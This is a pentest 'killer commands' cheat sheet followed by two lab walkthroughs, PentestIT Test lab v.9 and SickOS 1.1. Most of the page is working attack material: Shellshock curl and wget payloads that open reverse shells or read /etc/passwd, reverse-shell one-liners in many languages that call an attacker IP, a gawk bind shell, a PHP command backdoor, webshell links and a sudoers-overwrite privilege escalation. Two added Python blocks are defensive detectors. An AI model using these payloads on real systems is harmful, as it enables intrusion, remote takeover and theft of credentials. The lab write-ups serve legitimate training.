Pentest Killer Commands

Cheat Sheets

Vulnerability assessment

Scanning a web application with nikto through a proxy:

nikto -host 192.168.xx.xx -useproxy http://192.168.xx.xx:3129

Directory brute forcing (dirb) through a proxy:

dirb http://192.168.XX.XX -p 192.168.XX.XX:3129

WPScan through a proxy:

wpscan --url 192.168.XX.XX/dir --proxy 192.168.XX.XX:3128

Curl commands

Fetching a page through a proxy:

  1. curl 192.168.XX.XX/robots.txt -x 192.168.XX.XX:3128
  2. curl --proxy 192.168.37.129:3128 http://192.168.37.129:80/robots.txt

Fetching with verbose output (-v shows the request and response headers):

curl -v 192.168.37.129 --proxy 192.168.37.129:3128

Shellshock exploitation with curl ($CMD is a placeholder for the command carried in the User-Agent header):

curl -H "User-Agent: () { :; }; echo; $CMD" --proxy http://192.168.37.129:3128 http://192.168.37.129/cgi-bin/status

Example:

curl -H "User-Agent: () { :; }; echo; /bin/uname -a" --proxy http://192.168.37.129:3128 http://192.168.37.129/cgi-bin/status
curl -x http://192.168.37.129:3128 -A "() { :; };/bin/sh -i >& /dev/tcp/192.168.32.41/443 0>&1" http://192.168.37.129/cgi-bin/status


Reverse shell with curl:

curl 'http://192.168.XX.XX/cgi-bin/index.cgi' --user-agent ';rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc XXX.XXX.XXX.XXX 80 >/tmp/f;exit' --data 'dest=%0ash</proc/self/environ'

Shellshock exploitation with wget:

wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" -e use_proxy=on -e http_proxy=192.168.79.178:3128 "http://192.168.79.178/cgi-bin/status"
wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/bash -i > /dev/tcp/192.168.79.173/4444 0<&1" -e use_proxy=on -e http_proxy=192.168.79.178:3128 "http://192.168.79.178/cgi-bin/status"

Spawn Shell

Spawn a Python TTY shell:

python -c 'import pty; pty.spawn("/bin/bash")'

Spawn an interactive sh shell:

/bin/sh -i

Spawn a shell from Perl (inside a Perl script, or as a one-liner):

exec "/bin/sh";

perl -e 'exec "/bin/sh";'

Spawn a shell from Ruby (inside a Ruby script, or with ruby -e):

exec "/bin/sh"

Spawn a shell from the vi editor:

:!bash

Spawn a shell from nmap interactive mode:

!sh

Reverse Shells

Kali Webshell directory:

root@kali:/usr/share/webshells# ls -ltr
total 0
drwxr-xr-x 2 root root 183 Jan 20 2016 php
drwxr-xr-x 2 root root 63 Jan 20 2016 perl
drwxr-xr-x 2 root root 33 Jan 20 2016 cfm
drwxr-xr-x 2 root root 34 Jan 20 2016 aspx
drwxr-xr-x 2 root root 56 Jan 20 2016 asp
drwxr-xr-x 1 root root 40 Feb 8 09:44 jsp
root@kali:/usr/share/webshells#


Bash:

  1. bash -i > /dev/tcp/ATTACKERS_IP/port 0>&1
  2. exec /bin/bash 0&0 2>&0
  3. 0<&196;exec 196<>/dev/tcp/ATTACKERS_IP/80; sh <&196 >&196 2>&196
  4. exec 5<>/dev/tcp/ATTACKERS_IP/80 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done
  5. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.156.130 445 >/tmp/f

Example:

bash -c "bash -i >& /dev/tcp/192.168.171.2/31337 0>&1"
http://192.168.XX.XX:8080/?page=1&rcmd=bash -c "bash -i >& /dev/tcp/ATTACKERS_IP/31337 0>&1"

PHP:

php -r '$sock=fsockopen("ATTACKERS_IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
Note: the socket is assumed to be file descriptor 3; if the shell does not come back, replace 3 with 4, 5, or 6.


Netcat:

  1. nc -e /bin/sh ATTACKERS_IP Port
  2. /bin/sh | nc ATTACKERS_IP Port
  3. rm -f /tmp/p; mknod /tmp/p p && nc ATTACKERS_IP 4444 0/tmp/p

Example:

nc -e /bin/sh 192.168.37.122 4444

Telnet:

  1. rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
  2. telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

Example:

telnet 192.168.37.130 80 | /bin/bash | telnet 192.168.37.130 443

Perl:

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Example:

perl -e 'use Socket;$i="192.168.1.XX";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Perl Windows:

  1. perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
  2. perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby:

ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java:

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Python:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Example:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.110.50",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Python reverse shell, URL-encoded:

python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22192.168.110.50%22%2C443))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27

Example:

http://192.168.XX.XX:port/?page=mailer&mail=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.1.14",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Gawk (bind shell script; save it to a file and run it with gawk -f):

#!/usr/bin/gawk -f
BEGIN {
    Port = 8080
    Prompt = "bkd> "
    Service = "/inet/tcp/" Port "/0/0"
    while (1) {
        do {
            printf Prompt |& Service
            Service |& getline cmd
            if (cmd) {
                while ((cmd |& getline) > 0)
                    print $0 |& Service
                close(cmd)
            }
        } while (cmd != "exit")
        close(Service)
    }
}


Building an exploit

Compile a 32-bit binary on 64-bit Linux:

gcc -m32 exploit.c -o exploit

Cross-compile a 32-bit Windows .exe on Linux (MinGW):

i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe

Shellshock payload (a bash function definition followed by the command, sent in an HTTP header such as User-Agent):

() { ignored;};/bin/bash -i >& /dev/tcp/192.168.221.139/443 0>&1
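As an added defensive example (not part of the original cheat sheet): a small Python detector for the Shellshock pattern used in the curl, wget and header payloads above. It checks request headers and combined-format access log lines for a bash function definition followed by a command; the header names it watches and the log lines are constructed samples.

```python
import re
from urllib.parse import unquote

# A Shellshock payload is a bash function definition "() { ... };" followed by
# the commands to run; this matches the "() { :; };", "() { test;};" and
# "() { ignored;};" forms used in the page's examples.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Client-supplied headers that CGI exports as environment variables.
WATCHED_HEADERS = ("user-agent", "referer", "cookie", "host")

def is_shellshock(value: str) -> bool:
    """True if a header value (possibly URL-encoded) carries the pattern."""
    return bool(SHELLSHOCK_RE.search(unquote(value)))

def scan_request(headers: dict) -> list:
    """Names of headers in one request that carry a Shellshock payload."""
    return [name for name, value in headers.items()
            if name.lower() in WATCHED_HEADERS and is_shellshock(value)]

# Combined log format: ip ident user [time] "request" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" \d+ \S+ "[^"]*" "([^"]*)"')

def scan_log(lines) -> list:
    """(client ip, request line) for every log line whose User-Agent matches."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_shellshock(m.group(3)):
            hits.append((m.group(1), m.group(2)))
    return hits

# Constructed sample lines (not real traffic); the two payloads mirror the
# curl/wget requests against /cgi-bin/status above.
SAMPLE_LOG = [
    '10.0.0.5 - - [28/May/2016:06:37:00 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '200 512 "-" "() { :; }; echo; /bin/uname -a"',
    '10.0.0.6 - - [28/May/2016:06:37:01 +0000] "GET /index.html HTTP/1.1" '
    '200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.7 - - [28/May/2016:06:37:02 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '200 512 "-" "() { test;};echo; id"',
]

if __name__ == "__main__":
    for ip, request in scan_log(SAMPLE_LOG):
        print(f"shellshock attempt from {ip}: {request}")
```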


Backdoors

PHP one-liner (executes whatever arrives in the cmd request parameter):

<?php system($_REQUEST[cmd]); ?>

Shells

DAws.php:

https://github.com/dotcppfile/DAws/blob/master/DAws.php

c99:

https://github.com/tennc/webshell/blob/master/php/PHPshell/c99shell/c99shell.php

b374k shell 3.2:

https://github.com/b374k/b374k

Privilege escalation

Cron job abuse (a low-privileged user writes into a script that root's cron executes):

echo 'chmod 777 /etc/sudoers && echo "<user name (LOW priv)> ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /dir/<cronfile to run>
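An added auditing example, not from the original page: Python checks for the three things this chain touches, the mode and owner of /etc/sudoers, passwordless ALL entries in sudoers, and cron scripts writable by anyone other than root. File contents and stat values are passed in as arguments, so the sample data below is constructed rather than read from a live host.

```python
import re
import stat

# Matches a sudoers user spec granting passwordless ALL, e.g.
# "alice ALL=NOPASSWD: ALL" or "alice ALL=(ALL) NOPASSWD: ALL".
NOPASSWD_ALL_RE = re.compile(
    r"^\s*([%+]?\w[\w.-]*)\s+\S+\s*=\s*(?:\([^)]*\)\s*)?NOPASSWD:\s*ALL\s*$")

def find_nopasswd_all(sudoers_text: str) -> list:
    """Principals given passwordless ALL in a sudoers body (comments ignored)."""
    found = []
    for line in sudoers_text.splitlines():
        line = line.split("#", 1)[0].rstrip()
        m = NOPASSWD_ALL_RE.match(line)
        if m:
            found.append(m.group(1))
    return found

def sudoers_mode_ok(mode: int, uid: int, gid: int) -> bool:
    """/etc/sudoers should be root:root 0440; the chain above makes it 0777 first."""
    return uid == 0 and gid == 0 and stat.S_IMODE(mode) == 0o440

def writable_cron_files(entries) -> list:
    """entries: (path, st_mode, st_uid) for files under /etc/cron*. Flags files
    not owned by root or writable by group/other, since root's cron runs them."""
    bad = []
    for path, mode, uid in entries:
        if uid != 0 or stat.S_IMODE(mode) & (stat.S_IWGRP | stat.S_IWOTH):
            bad.append(path)
    return bad

def audit(sudoers_text: str, sudoers_stat: tuple, cron_entries) -> dict:
    """Run the three checks and return the findings together."""
    return {
        "sudoers_mode_ok": sudoers_mode_ok(*sudoers_stat),
        "nopasswd_all": find_nopasswd_all(sudoers_text),
        "writable_cron": writable_cron_files(cron_entries),
    }

# Constructed sample data (not a real host): an appended sudoers user and a world-writable cron script.
SAMPLE_SUDOERS = """Defaults env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
www-data ALL=NOPASSWD: ALL   # line appended by the cron job
"""
SAMPLE_SUDOERS_STAT = (0o100440, 0, 0)   # (st_mode, st_uid, st_gid)
SAMPLE_CRON = [("/etc/cron.d/backup", 0o100644, 0),
               ("/etc/cron.hourly/update", 0o100666, 0),
               ("/etc/cron.daily/report", 0o100755, 1000)]
```

Feed real values with open("/etc/sudoers").read(), os.stat("/etc/sudoers") and os.scandir over the cron directories; the same sudoers check applies to the "sudo -l shows ALL" situation in the SickOS walkthrough at the end of this page.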


Reference sites for enumeration:

http://www.speedguide.net/port.php?port=8080
https://www.youtube.com/user/myexploit2600
https://myexploit.wordpress.com/port-number-exploits/
https://docs.google.com/uc?export=download&confirm=wKvF&id=0Bx3odaY_Hs9oaGZuTGJnMG9lUUU
https://myexploit.wordpress.com/control-metasploit-post-exploits/
http://www.bekkoame.ne.jp/~s_ita/port/port1-99.html
http://www.speedguide.net/ports_sg.php
https://securitythoughts.wordpress.com/2010/03/22/vulnerable-web-applications-for-learning/
http://www.vulnerabilityassessment.co.uk/nfs.htm
https://ma.ttias.be/remote-code-execution-via-http-request-in-iis-on-windows/
https://www.pentestpartners.com/blog/using-nfsshell-to-compromise-older-environments/

Reference links for LFI:

https://highon.coffee/blog/lfi-cheat-sheet/

iptables rules:

https://www.suse.com/communities/blog/basic-iptables-tutorial/


PentestIT Test lab v.9


The “Test lab” penetration testing laboratories emulate the IT infrastructure of real companies and are created for legal pentesting and for improving penetration testing skills. Each laboratory is unique and contains the most recent and well-known vulnerabilities.

Test lab v.9 models a professional software development company, CyBear 32C*, engaged in the development of various information security systems and applications, so it is well protected against hacker attacks. Compromising CyBear 32C*’s corporate network requires good penetration testing skills.

Network diagram:

https://lab.pentestit.ru/images/labs/TL9_map.png

To reach the internal network we first have to bypass the gateway 192.168.101.8.

Nmap scan output:

Starting Nmap 6.47 ( http://nmap.org ) at 2016-05-28 06:37 EDT
Nmap scan report for cybear32c.lab (192.168.101.8)
Host is up (0.18s latency).
Not shown: 994 filtered ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 6.0p1 Debian 4+deb7u4 (protocol 2.0)
25/tcp   open  smtp       Postfix smtpd
80/tcp   open  http       nginx 1.10.0
443/tcp  open  http       nginx 1.8.1
3128/tcp open  http-proxy Squid http proxy 3.4.8
8100/tcp open  http       nginx
Service Info: Host: -mail.cybear32c.lab; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Ports 80 and 443 are not accessible with a browser, while on port 8100 I could access the Roundcube mail application. I tried to enumerate the application using “dirb” but found nothing interesting. Ports 80 and 443 seem to be protected by a WAF: every time I tried to access port 80 I got an error message. So I added the DNS name with the IP to the /etc/hosts file and reloaded the page, which landed on the correct page; I tried the same dirb scan on port 80, but it gave nothing useful. As a last try I enumerated port 443 and noticed something interesting 😉 the Heartbleed vulnerability.

nmap -sV --script=ssl-heartbleed 192.168.101.8

Starting Nmap 6.47 ( http://nmap.org ) at 2016-05-28 06:58 EDT
Nmap scan report for cybear32c.lab (192.168.101.8)
Host is up (0.17s latency).
Not shown: 994 filtered ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 6.0p1 Debian 4+deb7u4 (protocol 2.0)
25/tcp   open  smtp       Postfix smtpd
80/tcp   open  http       nginx 1.10.0
443/tcp  open  http       nginx 1.8.1
| ssl-heartbleed: 
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL 
|   cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High
|     Description:
|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|           
|     References:
|       http://www.openssl.org/news/secadv_20140407.txt 
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|_      http://cvedetails.com/cve/2014-0160/
3128/tcp open  http-proxy Squid http proxy 3.4.8
8100/tcp open  http       nginx
Service Info: Host: -mail.cybear32c.lab; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Exploited the Heartbleed vulnerability using the Metasploit auxiliary module “auxiliary/scanner/ssl/openssl_heartbleed”.

After running the module several times, the leaked memory contained an interesting /var/www path. Using that path I navigated the page and got the BYPASS token.

SickOS 1.1 Walkthrough

Attacking machine: Linux kali 4.3.0-kali1-amd64

Vulnerable machine: SickOS 1.1

Download:

Scanning

Started the scan with the netdiscover command to find live hosts on my network.

Netdiscover detected three IPs, including the gateway and the default address.

So our target is 192.168.37.129.

Enumeration:

Run nmap to detect which services are running on the machine.

nmap -sS -sV -T4 -A 192.168.37.129

The nmap scan returns SSH and proxy port information.

Looking at port 3128 we know that a web server is running and that it can be reached through the proxy port.

Configure the local browser to use this proxy in order to access the web page.

We are all set to access the web application. Now run nikto to detect whether any vulnerabilities are present in this application.

nikto -h http://192.168.37.129:3128 -o out -F html

We found that robots.txt is present and that a Wolf CMS directory exists.

Navigating to the wolfcms directory lands on the Wolf CMS application.

By doing some research on the web I found the admin page location for the CMS application and its default user name and password.

With the default user name and password I was able to log in to the administrator account of the Wolf CMS application. In the Files tab of the application, the “Upload file” function is available in the public directory and accepts any file.

I created a c99 shell on the attacking machine and uploaded it with the “Upload file” option.

To launch the shell, navigate to the public directory and open shell.php, which returns a web shell.

Using the web shell we can list and navigate directories. Navigating one directory up, I found a config file.

The config file discloses the MySQL root password. I navigated to the etc directory and found the passwd file with read permissions; it can be downloaded with the web shell.

By analyzing passwd we know that “sickos” is a valid user with a bash shell.

I tried to log in as the sickos user with the password found in the config file, and succeeded.

Privilege escalation:

Having only limited user access, I ran the sudo -l command to see which other commands the sickos user can run.

Interestingly, the sickos user can run all commands 🙂

Switching to the root user with sudo -s, I was logged in to the root account without a password.